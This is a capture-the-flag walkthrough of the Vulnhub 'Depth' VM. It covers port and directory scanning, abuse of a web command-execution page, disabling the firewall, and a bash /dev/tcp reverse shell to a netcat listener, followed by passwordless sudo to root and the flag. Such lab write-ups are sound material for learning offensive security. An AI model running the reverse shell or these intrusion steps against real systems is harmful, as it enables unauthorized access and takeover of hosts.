Depth 1 Writeup

This is the write-up of Depth, boot2root vm on Vulnhub.

First, I start as usual, with a port scan on the box.

# Nmap 7.50 scan initiated Fri Dec 22 16:07:55 2017 as: nmap -A -T4 -sV -p- -Pn -n -v -oA full 192.168.1.76
adjust_timeouts2: packet supposedly had rtt of -1293499 microseconds.  Ignoring time.
Nmap scan report for 192.168.1.76
Host is up (0.00087s latency).
Not shown: 65534 filtered ports
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
| http-methods: 
|   Supported Methods: GET HEAD POST PUT DELETE OPTIONS
|_  Potentially risky methods: PUT DELETE
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat
MAC Address: 00:0C:29:3E:AD:42 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.11 - 4.1
Uptime guess: 38.020 days (since Tue Nov 14 15:48:53 2017)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE
HOP RTT     ADDRESS
1   0.87 ms 192.168.1.76

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Dec 22 16:17:55 2017 -- 1 IP address (1 host up) scanned in 600.27 seconds

As can be seen by the scan, only one port open, 8080. Navigating to that port, presents what looks like a default installation of tomcat, with certain files removed.

Moving on, I decide to go with some dirbusting on the server, see if there are any interesting files.

[email protected]:~/Tools/dirsearch# ./dirsearch.py -u http://192.168.1.76:8080/ -w ../SecLists/Discovery/Web_Content/raft-small-files.txt -t 20 -b -e "jsp"

 _|. _ _  _  _  _ _|_    v0.3.7
(_||| _) (/_(_|| (_| )

Extensions: jsp | Threads: 20 | Wordlist size: 11424

Error Log: /root/Tools/dirsearch/logs/errors-17-12-22_16-22-30.log

Target: http://192.168.1.76:8080/

[16:22:30] Starting: 
[16:22:30] 200 -    2KB - /index.html
[16:22:32] 200 -    2KB - /
[16:23:08] 200 -  573B  - /test.jsp

Task Completed

A page test.jsp was found. Let's see what this is about with a browser.

So what the page seems to be doing is, run the command that I input in the textbox (not all commands run, for example echo into files seems to not work) and then prints the output after formatting the text accordingly.

With an ls -l in /home/ I manage to get the username of the local user.

With that at hand, and after many failed attempts to try and actually run some useful commands, I notice that by piping commands in through SSH I am able to run them. For example, sudo -l doesn't seem to work, but ssh [email protected] sudo -l runs just fine.

Even though the formatting is odd, the text returned seems quite similar to this one User root may run the following commands on kali. So it seems that the user does have some access privileged access on the system.

Taking a leap of faith and since all outbound traffic is being probably being blocked, I go ahead and disable the firewall

No output, we are going blind here, taking that leap of faith a bit forward, I run a reverse shell the same way with ssh [email protected] bash -i >& /dev/tcp/192.168.1.86/4444 0>&1  and since the page doesn't load directly I have a good feeling about this.

At the same time on my local netcat listener

[email protected]:~/Documents/ctfs/vulnhub/depth# nc -lvp 4444
listening on [any] 4444 ...
connect to [192.168.1.86] from b2r.lan [192.168.1.76] 40468
bash: cannot set terminal process group (2906): Inappropriate ioctl for device
bash: no job control in this shell
[email protected]:~$ whoami
whoami
bill
[email protected]:~$ id
id
uid=1000(bill) gid=1000(bill) groups=1000(bill),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),111(lxd),116(lpadmin),117(sambashare)
[email protected]:~$

And there it is. It all worked just fine. Now let's check out what kind of access the user has.

[email protected]:~$ sudo -l
sudo -l
Matching Defaults entries for bill on b2r:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User bill may run the following commands on b2r:
    (ALL : ALL) NOPASSWD: ALL

So bill has full access as root without needing a password. That means head straight for the flag.

[email protected]:~$ sudo su
sudo su
cd /root/
ls
flag
cat flag
flag{WellThatWasEasy}

Aaand there it is, the root flag. Thanks a lot for Vulnhub, and Dan Lawson for building this vm.

Comments